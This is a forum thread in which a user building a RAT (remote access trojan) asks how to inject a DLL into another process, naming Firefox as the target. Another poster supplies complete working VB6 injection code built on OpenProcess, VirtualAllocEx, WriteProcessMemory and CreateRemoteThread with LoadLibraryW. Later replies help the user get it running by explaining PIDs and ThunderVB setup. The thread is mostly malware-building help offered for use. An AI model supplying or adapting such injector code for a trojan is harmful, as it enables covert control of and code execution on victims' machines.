Thread: c++ injector to inject a vb file

Hello!
For a few days i have tryed to understand how to get a injector written in c++ to inject a vb 6.0 dll file.
Becouse i know that it is almoste impossible to write a injector in vb 6.0, so i have to use one that is written in c++/delphi right?
The problem is that i dont understand c++ so well and then i look at some source for a injector in c++ i dont know how to conf it so it will work for my RAT i'm trying to make.

So i wondering if anybody could post a small example on a injector in c++, and maby comment some of the parts of the code so its easy to understand what they do etc.
And maby a example for just a dll in VB 6.0 that just make a msgbox then its injected.

Thanks alot!

Vb6 doesn't produces normal Dlls, but Active-X Dlls.
Though you can build normal Dlls with the help of ThunderVB

Becouse i know that it is almoste impossible to write a injector in vb 6.0

Dude, it's even easier to write one in VB...
Also, you have to compile the DLL to a native one, VB can't do this on his own, so you need some plugins like ThunderDLL.

have a nice day

Thanks for the answers.
Is this the plugin i need to download? (http://sourceforge.net/projects/thundervb)

Dude, it's even easier to write one in VB...

Maby you have or can point me to a example?

for use of dll in own process:

Code:

LoadLibrary "C:\mydll.dll"

Dll injection:

Code:

Option Explicit
Private Declare Function GetProcAddress Lib "kernel32.dll" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function GetModuleHandle Lib "kernel32.dll" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long

Private Declare Function GetExitCodeThread Lib "kernel32" (ByVal hThread As Long, lpExitCode As Long) As Long

Private Declare Function WaitForSingleObject Lib "kernel32.dll" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Const INFINITE As Long = &HFFFFFFFF

Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const SYNCHRONIZE As Long = &H100000
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)

Private Declare Function CreateRemoteThread Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lStartAddress As Long, ByVal lParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lAddress As Long, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_DECOMMIT As Long = &H4000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)

Public Function InjectDll(ByVal lPID As Long, ByVal sDllPath As String) As Long
Dim hProcess As Long, hThread As Long
Dim pMem As Long, pLoadLib As Long
Dim lRet As Long, lTemp As Long
    pLoadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryW")
    If pLoadLib = 10 Then Exit Function
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, lPID)
    If hProcess = 0 Then Exit Function
    pMem = VirtualAllocEx(hProcess, 0, LenB(sDllPath), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    If pMem = 0 Then
        CloseHandle hProcess
        Exit Function
    End If
    lRet = WriteProcessMemory(hProcess, pMem, StrPtr(sDllPath), LenB(sDllPath), lTemp)
    If lRet = 0 Or lTemp = 0 Then
10:
        VirtualFreeEx hProcess, pMem, LenB(sDllPath), MEM_DECOMMIT
        CloseHandle hProcess
        InjectDll = 0
        Exit Function
    End If
    hThread = CreateRemoteThread(hProcess, 0, 0, pLoadLib, pMem, 0, lTemp)
    If hThread = 0 Then GoTo 10
    WaitForSingleObject hThread, INFINITE
    GetExitCodeThread hThread, InjectDll
    VirtualFreeEx hProcess, pMem, LenB(sDllPath), MEM_DECOMMIT
    CloseHandle hThread
    CloseHandle hProcess
End Function

Thanks.
Now i feel really noobish, i cant even get the function to work (ofc i use it wrong)
I'm trying with:
Call InjectDll("Firefox.exe", "C:\Documents and Settings\xxx\Skrivbord\Project1.dll")
And i just cant get it to work. So what do i do wrong? :/

And i have a question i hope somebody can answer ^^. How do u make a "normall" dll with Thundervb?, then i make a project there is no new type to select (exe,ActiveX exe,ActiveX dll)

There is an example included in thunderVb, search for it and use it. Just put a Messagebox in Sub Main. Also be sure the plugin is enabled. U also have to configure thundervb to use masm/fasm/...

Originally Posted by Zuzyk

Thanks.
Now i feel really noobish, i cant even get the function to work (ofc i use it wrong)
I'm trying with:
Call InjectDll("Firefox.exe", "C:\Documents and Settings\xxx\Skrivbord\Project1.dll")
And i just cant get it to work. So what do i do wrong? :/

And i have a question i hope somebody can answer ^^. How do u make a "normall" dll with Thundervb?, then i make a project there is no new type to select (exe,ActiveX exe,ActiveX dll)

Dude,, you even looked at the code? you pass "FireFox.exe" but the parameter should be a long value => a PID of a process..

Ooh, and k0ston,, this is from the ThunderVB part it was the first dll injection script i could find xD

Originally Posted by SqUeEzEr

Dude,, you even looked at the code? you pass "FireFox.exe" but the parameter should be a long value => a PID of a process..

Ooh, and k0ston,, this is from the ThunderVB part it was the first dll injection script i could find xD

Thanks again for trying to help me.
Sorry but the moste time i'm a fast learner (alot thanks to google) but this time i just dont get.
Now for about 30 min i have tryed to install ThunderVB right but i'm not getting it to work they way i thing it should work :S. I have used google alot and i cant find how to install it (the readme dont say much), there must be something i have missed.

And ofc i read the code, i have found that code on the internet before (not exactly the same but..).
So with the Pid thing i didnt get it to work was becouse i simply just didint know wtf Pid was.
And now i know its some sort of ID for a program to identify it?

For the dll,, just download the dll examples on the thunderVB homepage.
For finding the pid, google "Visual Basic PID process name" or something like that xD

PID => Process ID, it is a number pointing to a process.